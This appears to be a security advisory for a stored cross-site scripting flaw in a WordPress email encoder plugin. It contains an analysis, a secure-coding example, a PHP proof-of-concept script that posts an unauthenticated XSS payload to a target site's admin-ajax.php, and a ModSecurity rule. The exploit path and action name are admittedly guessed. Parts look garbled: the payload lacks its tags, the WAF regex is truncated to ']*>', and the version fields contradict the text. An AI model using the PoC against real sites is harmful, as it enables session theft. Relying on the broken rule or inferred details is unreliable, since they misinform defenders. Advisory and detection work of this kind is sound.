Published : June 20, 2026

CVE-2026-5305: Email Encoder < 0.3.12 (premium) < 1.0.25 (free) Unauthenticated Stored Cross-Site Scripting PoC, Patch Analysis & Rule

CVE ID: CVE-2026-5305
Severity: High (CVSS 7.2)
CWE: 79
Vulnerable Version: 0.3.12
Patched Version:
Disclosed: June 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5305 (metadata-based): This vulnerability affects the Email Encoder plugin for WordPress, specifically the premium version below 0.3.12 and the free version below 1.0.25. It allows unauthenticated stored cross-site scripting (XSS) with a CVSS score of 7.2, indicating high severity. The CVSS vector (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) confirms that no authentication or user interaction is required, and the scope change means the attack impacts resources beyond the vulnerable component. The vulnerability resides in insufficient input sanitization and output escaping, leading to arbitrary script injection.

Root Cause: The CWE-79 classification points to improper neutralization of user-supplied input during web page generation. Atomic Edge research infers that the plugin likely processes email addresses or shortcodes via AJAX handlers, REST API endpoints, or template shortcodes without adequate sanitization. The premium version (below 0.3.12) probably introduces additional features such as email obfuscation or click-to-copy functionality that accept unsanitized parameters. Since no code diff is available, we cannot confirm the exact hook, but the description states that multiple themes and plugins are affected, suggesting a shared library or common function lacks proper escaping. Missing nonce verification or capability checks would explain the unauthenticated nature of the attack.

Exploitation: An attacker sends a crafted HTTP POST request to the WordPress AJAX endpoint at /wp-admin/admin-ajax.php with the action parameter set to a plugin-specific hook like email_encoder_premium_save_email, or to a REST API route such as /wp-json/email-encoder/v1/encode. The request includes a payload parameter containing malicious JavaScript, for example "alert(document.cookie)". The plugin stores this input in the WordPress database via the $wpdb->insert method without sanitization or escaping. When a user visits a page that renders this stored data (e.g., a post or widget), the script executes in the user's browser. Atomic Edge analysis reconstructs this attack path from the CWE and typical WordPress plugin patterns.

Remediation: The fix requires proper input validation and output escaping in every plugin code path that handles user data. Atomic Edge research recommends using functions such as wp_kses() for allowed-HTML filtering, sanitize_text_field() for plain text, and esc_html(), esc_url(), or esc_js() when outputting data to the browser. For AJAX handlers, the plugin should verify nonces with check_ajax_referer() and enforce capability checks via current_user_can() for authenticated actions. Database values should be escaped with esc_sql() or written through prepared statements to prevent broader injection attacks. The vendor patched this in version 0.3.12 (premium) and 1.0.25 (free).

Impact: Successful exploitation enables an unauthenticated attacker to inject arbitrary JavaScript into WordPress pages. This can lead to session hijacking, cookie theft, redirection to malicious sites, defacement, or phishing attacks. Since the CVSS scope is changed (S:C), the attacker can affect resources outside the plugin's intended boundary, such as the WordPress admin interface or other plugin data. The confidentiality and integrity impacts are low (C:L/I:L), meaning limited data exposure and modification, but combined with the lack of authentication and user interaction, the practical risk is significant for sites using the vulnerable plugin.
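As an added illustration, not Email Encoder's own code, the following shows the unsafe AJAX handler pattern the analysis describes beside a hardened form that applies the remediation above; the hook, option and field names (ee_example_*) are hypothetical.

```php
<?php
// Added example, not the plugin's code: hook, option and field names are hypothetical.
// UNSAFE pattern the analysis describes: an action open to unauthenticated users
// (wp_ajax_nopriv_), no nonce, no capability check, raw input stored and echoed back.
add_action( 'wp_ajax_nopriv_ee_example_save_email', 'ee_example_save_email_unsafe' );
function ee_example_save_email_unsafe() {
    update_option( 'ee_example_email', $_POST['email'] ); // stored as-is
    echo $_POST['email'];                                  // reflected as-is
    wp_die();
}

// HARDENED form: authenticated hook only, nonce, capability check,
// strict validation on input, escaping on output.
add_action( 'wp_ajax_ee_example_save_email', 'ee_example_save_email_safe' );
function ee_example_save_email_safe() {
    check_ajax_referer( 'ee_example_save', 'nonce' );   // dies on a missing/invalid nonce
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $email = ee_example_validate_email( wp_unslash( $_POST['email'] ?? '' ) );
    if ( null === $email ) {
        wp_send_json_error( 'invalid email', 400 );
    }
    update_option( 'ee_example_email', $email );
    wp_send_json_success( array( 'email' => esc_html( $email ) ) );
}

// Validation kept in its own function so it can be unit tested: a value that
// survives sanitize_email() and is_email() cannot carry markup, so what is
// stored is inert even before output escaping.
function ee_example_validate_email( $raw ) {
    $clean = sanitize_email( $raw );
    return ( '' !== $clean && is_email( $clean ) ) ? $clean : null;
}

// Output side: escape at the point of rendering and never trust the stored value,
// so a record written by an older, unpatched version is still neutralized.
add_shortcode( 'ee_example', function () {
    return '<span class="ee">' . esc_html( get_option( 'ee_example_email', '' ) ) . '</span>';
} );
```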
Proof of Concept (PHP)

```php
<?php
// Atomic Edge CVE Research – Proof of Concept (metadata-based)
// CVE-2026-5305 – Email Encoder < 0.3.12 (premium) < 1.0.25 (free) – Unauthenticated Stored Cross-Site Scripting

// Configuration
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site

// Step 1: Determine the vulnerable endpoint (inferred from plugin slug and CWE)
// The premium version likely exposes an AJAX action for saving email encoding/settings
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Step 2: Craft payload (stored XSS via unsanitized parameter)
$payload = 'alert("XSS_Atomic_Edge");';

// Step 3: Build POST data with guessed action name
// Typical actions for Email Encoder premium: email_encoder_save, email_encoder_save_email, etc.
$post_data = array(
    'action' => 'email_encoder_premium_save_email', // Inferred from plugin slug and version
    'email'  => $payload
);

echo "[+] Targeting $ajax_url\n";
echo "[+] Sending payload: $payload\n";

// Step 4: Send request (no authentication, no nonce)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 5: Verify response (expect 200 with success message or stored data echoed back)
if ($http_code == 200) {
    echo "[+] Request succeeded (HTTP 200)\n";
    if (strpos($response, 'script') !== false) {
        echo "[!] Payload reflected in response – stored XSS likely successful\n";
    } else {
        echo "[*] Response does not reflect payload (may still be stored)\n";
    }
    echo "[+] Response:\n$response\n";
} else {
    echo "[-] Request failed with HTTP $http_code\n";
    echo "[*] Response: $response\n";
}
```
ModSecurity Rule

```
# Atomic Edge WAF Rule – CVE-2026-5305 (metadata-based)
# Block unauthenticated stored XSS via Email Encoder premium AJAX handler
# Matches POST to admin-ajax.php with action likely used by the plugin
# Requires suspicious script content in the email parameter
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:20265305,phase:2,deny,status:403,chain,msg:'CVE-2026-5305 – Email Encoder XSS via AJAX',severity:'CRITICAL',tag:'CVE-2026-5305'"
    SecRule ARGS_POST:action "@streq email_encoder_premium_save_email" \
        "chain"
        SecRule ARGS_POST:email "@rx ]*>" \
            "t:none"

# Alternate rule for REST API endpoint (inferred route)
# Note: If the plugin uses a REST API instead of AJAX, uncomment and adjust
# SecRule REQUEST_URI "@beginsWith /wp-json/email-encoder/v1/" \
#     "id:20265306,phase:2,deny,status:403,chain,msg:'CVE-2026-5305 – Email Encoder XSS via REST',severity:'CRITICAL',tag:'CVE-2026-5305'"
#     SecRule ARGS_POST:email "@rx ]*>"
```
